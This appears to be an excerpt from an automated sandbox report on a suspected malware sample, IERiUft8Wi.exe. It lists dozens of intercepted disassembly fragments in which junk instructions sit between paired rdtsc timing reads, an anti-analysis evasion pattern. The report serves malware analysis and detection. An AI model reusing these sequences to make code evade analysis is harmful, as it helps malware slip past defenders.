                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AE9674 second address: AE969A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0E38E1CB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0E38E1CB27h 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AEA393 second address: AEA3B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F0E3850A359h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AEA3B5 second address: AEA3CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB21h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AEA3CA second address: AEA3ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F0E3850A346h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F0E3850A34Fh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AEA3ED second address: AEA3F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AEA3F1 second address: AEA40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E3850A34Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AEA40D second address: AEA420 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0E38E1CB1Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AEDD2B second address: AEDD2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AEDD2F second address: AEDD35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AEDD35 second address: AEDD4E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0E3850A34Dh 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AEDE8F second address: AEDEAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB29h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AEDEAC second address: AEDEB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AEDEB6 second address: AEDEC0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E38E1CB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AFCDBB second address: AFCDCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0E3850A346h 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AFF92C second address: AFF932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AF88AE second address: AF88B8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E3850A34Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AF88B8 second address: AF88CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F0E38E1CB18h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AF88CB second address: AF88D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B0F6C4 second address: B0F6DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E38E1CB1Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B0F41E second address: B0F42B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 je 00007F0E3850A346h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B245C4 second address: B245E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB1Eh 0x00000007 jnc 00007F0E38E1CB18h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F0E38E1CB16h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B245E9 second address: B245ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B245ED second address: B245F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B245F1 second address: B245F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B249DD second address: B249E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B249E1 second address: B24A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F0E3850A360h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F0E3850A358h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B24A0B second address: B24A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B24E49 second address: B24E66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A357h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B24E66 second address: B24E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B24FC0 second address: B24FC6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B24FC6 second address: B24FD2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E38E1CB1Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B25113 second address: B25150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007F0E3850A352h 0x0000000b pop ebx 0x0000000c jnp 00007F0E3850A371h 0x00000012 jmp 00007F0E3850A355h 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F0E3850A346h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B26D8C second address: B26D9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jg 00007F0E38E1CB16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B29770 second address: B29786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A352h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B29CDF second address: B29D10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D1EE2h], eax 0x00000012 push eax 0x00000013 clc 0x00000014 pop edx 0x00000015 push dword ptr [ebp+122D33C6h] 0x0000001b mov dword ptr [ebp+1245551Bh], eax 0x00000021 push 6A0054CFh 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B29D10 second address: B29D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B2D25F second address: B2D268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: B2D268 second address: B2D26C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D40470 second address: 4D40476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D40476 second address: 4D4047A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D4047A second address: 4D4048F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ax, dx 0x0000000f mov edx, 7C2C725Eh 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D4048F second address: 4D404CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A354h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F0E3850A34Ah 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0E3850A357h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D404CF second address: 4D404F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dh 0x00000005 jmp 00007F0E38E1CB20h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edx, dword ptr [ebp+0Ch] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D404F0 second address: 4D404F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D404F4 second address: 4D404F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D404F8 second address: 4D404FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D40547 second address: 4D4054B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D4054B second address: 4D4055E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D4055E second address: 4D40564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D40564 second address: 4D40587 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F0E3850A34Bh 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D40587 second address: 4D4058C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D6077B second address: 4D6077F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D6077F second address: 4D60785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D60785 second address: 4D6081A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ch, D7h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c mov dx, ax 0x0000000f mov dx, si 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 jmp 00007F0E3850A358h 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c jmp 00007F0E3850A34Eh 0x00000021 mov si, 40B1h 0x00000025 popad 0x00000026 xchg eax, ecx 0x00000027 pushad 0x00000028 mov ebx, esi 0x0000002a pushfd 0x0000002b jmp 00007F0E3850A356h 0x00000030 sub si, B1B8h 0x00000035 jmp 00007F0E3850A34Bh 0x0000003a popfd 0x0000003b popad 0x0000003c push eax 0x0000003d jmp 00007F0E3850A359h 0x00000042 xchg eax, ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 mov ecx, ebx 0x00000048 mov edi, 2799113Ah 0x0000004d popad 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D6081A second address: 4D60835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E38E1CB27h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D60835 second address: 4D608B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F0E3850A352h 0x0000000e mov dword ptr [esp], esi 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F0E3850A34Eh 0x00000018 sbb si, 4008h 0x0000001d jmp 00007F0E3850A34Bh 0x00000022 popfd 0x00000023 mov ah, 66h 0x00000025 popad 0x00000026 lea eax, dword ptr [ebp-04h] 0x00000029 pushad 0x0000002a mov edi, 735452E4h 0x0000002f pushfd 0x00000030 jmp 00007F0E3850A34Dh 0x00000035 and cx, 0326h 0x0000003a jmp 00007F0E3850A351h 0x0000003f popfd 0x00000040 popad 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F0E3850A34Dh 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D608B6 second address: 4D608E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F0E38E1CB1Dh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007F0E38E1CB23h 0x00000017 pop ecx 0x00000018 mov cx, dx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D608E8 second address: 4D60917 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 6DDF0817h 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edi, 4E3EAF46h 0x00000016 call 00007F0E3850A357h 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D6096B second address: 4D6097D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E38E1CB1Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D6097D second address: 4D6098D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D6098D second address: 4D609A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D609DF second address: 4D609EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D609EE second address: 4D60A2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 pushfd 0x00000007 jmp 00007F0E38E1CB1Bh 0x0000000c sub eax, 599B0E0Eh 0x00000012 jmp 00007F0E38E1CB29h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D60A2B second address: 4D60A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D60A2F second address: 4D60A35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D60A35 second address: 4D60A76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A352h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007F0E3850A350h 0x0000000f leave 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0E3850A357h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D60A76 second address: 4D60A8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E38E1CB24h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D60A8E second address: 4D50130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0004h 0x0000000e nop 0x0000000f sub esp, 04h 0x00000012 xor ebx, ebx 0x00000014 cmp eax, 00000000h 0x00000017 je 00007F0E3850A4AAh 0x0000001d mov dword ptr [esp], 0000000Dh 0x00000024 call 00007F0E3C9F6609h 0x00000029 mov edi, edi 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50130 second address: 4D50134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50134 second address: 4D5013A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D5013A second address: 4D50169 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov si, 7D7Dh 0x0000000f mov ch, 74h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0E38E1CB1Bh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50169 second address: 4D5016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D5016F second address: 4D501AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0E38E1CB1Bh 0x00000015 sbb ah, FFFFFFCEh 0x00000018 jmp 00007F0E38E1CB29h 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D501AF second address: 4D501B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D501B4 second address: 4D501BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D501BA second address: 4D501BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D501BE second address: 4D501DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E38E1CB20h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D5036B second address: 4D50377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov cx, 54B9h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D50377 second address: 4D503B9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0E38E1CB26h 0x00000008 add ch, FFFFFFC8h 0x0000000b jmp 00007F0E38E1CB1Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 sub edi, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0E38E1CB21h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D503B9 second address: 4D503BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D503BF second address: 4D503C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D503C5 second address: 4D503C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: 4D503C9 second address: 4D503CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
